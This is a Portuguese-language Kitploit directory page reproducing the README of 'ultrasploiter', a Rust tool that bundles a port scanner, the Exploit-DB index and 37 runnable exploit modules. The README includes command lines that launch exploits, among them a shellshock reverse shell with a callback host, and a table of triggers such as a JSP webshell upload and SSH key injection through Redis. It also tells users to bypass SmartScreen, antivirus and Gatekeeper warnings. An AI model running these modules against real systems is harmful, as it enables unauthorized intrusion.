Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitLabGitLab/vqkro/ultrasploiter
Frameworks de Testes de PenetraçãoReconhecimentoScanners de VulnerabilidadesFrameworks de ExploraçãoMapeamento de RedeEscaneamento de PortasExploraçãoExploração de Aplicações WebColeta de InformaçõesComando e ControleRed Teaming
10há 13h 11mAinda não revisado
Desenvolvimento de Payloads
GitLabvqkro/ultrasploiter

ultrasploiter

Um único binário que combina um scanner de portas, o índice completo do Exploit-DB (47 mil entradas) e módulos de exploit executáveis em uma só ferramenta. Escrito em Rust, roda em Linux, Windows e macOS.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

UltraSploiter

scan, match, exploit — one IP in, shells out.

Um único binário que reúne um scanner de portas, o índice completo do Exploit-DB e um conjunto de módulos de exploit executáveis em uma só ferramenta. Funciona em Linux, Windows e macOS.

tarefanormalmenteaqui
Encontrar serviços em um hostnmapUltraSploiter scan <ip>
Procurar exploitssearchsploitUltraSploiter search <kw>
Dispará-losmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


Instalação

A forma mais simples e melhor é apenas baixar o binário pré-compilado e executá-lo. Nada para instalar, sem dependências — um único arquivo autocontido.

Baixe na página de Releases:

  • Windows — UltraSploiter-windows-x86_64.exe → clique duas vezes
  • Linux — UltraSploiter-linux-x86_64
  • macOS — ainda sem binário pré-compilado; compile com um comando (abaixo)

Atenção: ferramentas de segurança são sinalizadas. O Windows SmartScreen e o antivírus provavelmente vão avisar ou colocar o binário em quarentena — clique em Mais informações → Executar assim mesmo, ou adicione uma exclusão se for mantê-lo por perto.

Windows

Clique duas vezes em UltraSploiter.exe. O menu abre.

Se o SmartScreen avisar sobre um publicador desconhecido (vai avisar, para qualquer binário não assinado), clique em Mais informações → Executar assim mesmo.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Se o Gatekeeper bloquear (de novo, qualquer binário não assinado), clique com o botão direito → Abrir, ou limpe a flag de quarentena uma vez:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Compilar a partir do código-fonte

Só é necessário se não houver binário para a sua plataforma, ou se você quiser modificá-lo. É necessário Rust 1.74+.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 usa o toolchain stable-x86_64-pc-windows-gnu, que faz link com MinGW — então você não precisa do Visual Studio nem do MSVC. Ele instala esse toolchain se estiver faltando. Se você já tem o MSVC Build Tools, um simples cargo build --release também funciona.

Atenção para Windows + GNU: windows-sys (trazido pelo tokio) invoca dlltool, que chama o assembler as — e o componente rust-mingw não inclui o as. O build.ps1 procura um bin do MinGW que o tenha em %~dp0tools\mingw64\bin e %USERPROFILE%\tools\mingw64\bin, e o adiciona ao PATH quando encontrado. Coloque um build do winlibs lá se você encontrar error calling dlltool. Toolchains MSVC não são afetados.


Executar

Sem argumentos, você recebe o menu:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Linha de comando

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

No Linux/macOS, prefixe com ./ (ex.: ./UltraSploiter scan 10.0.0.5).

Flags de scan

flagsignificado
-p <spec>top (1000), 80,443, 1-1024, - (todas)
-T0..-T5template de timing — mais lento/silencioso a mais rápido/ruidoso
-sUscan de sondagem UDP
-sVdetecção de serviço/versão (ativada por padrão)
--no-bannerpular captura de banner
--jsonJSON para stdout
-oX <file>XML no estilo nmap

O scanner é assíncrono (tokio): cada nível -T define quantos sockets estão em voo ao mesmo tempo (até 8000 em -T5), então ele cobre o top-1000 do nmap em alguns segundos. Cada "open" é um handshake TCP completo, então os resultados são exatos.

Opções (-o key=value)

chaveusada porsignificado
lhost, lportmódulos de rev-shellendereço de callback
rportmódulos websobrescrever a porta HTTP
pathshellshock, struts, phpunitcaminho do endpoint
user, passtomcat_managercredenciais do manager
coresolr_rcenome do core do Solr
filegrafana_lfiarquivo a ler
ssh_pubkeyredis_unauthchave a inserir em authorized_keys
src, dstproftpd_modcopyorigem / destino da cópia
timeouttodostimeout de socket em segundos

Banco de dados de exploits

search e info são suportados pelo índice completo do Exploit-DB — mais de 47.000 entradas (o mesmo conjunto de dados que o searchsploit usa), embutido no binário. Quando uma entrada possui um CVE que um módulo executável implementa, info liga os dois:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Módulos executáveis (37)

móduloCVEgatilho
vsftpd_234CVE-2011-2523usuário :) → bind shell root na 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> via IRC
distcc_execCVE-2004-2687argumento do compilador do protocolo DIST
proftpd_modcopyCVE-2015-3306cópia de arquivo SITE CPFR/CPTO
redis_unauth—CONFIG SET grava uma chave ou entrada de cron
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL em Content-Type
tomcat_putCVE-2017-12615PUT de um webshell JSP
tomcat_manager—implantar um WAR via /manager
elasticsearch_groovyCVE-2015-1427RCE via Groovy em _search
drupalgeddon2CVE-2018-7600callback de renderização da Form API
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000Groovy não autenticado em /script
solr_rceCVE-2019-17558template Velocity em stream.body
grafana_lfiCVE-2021-43798leitura de arquivo via path traversal de plugin
webmin_backdoorCVE-2019-15107password_change.cgi injeta um valor em um shell
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file via query string

Cada um implementa um check() não destrutivo e um run().

Módulos de catálogo (orientados a dados)

Baixar ferramenta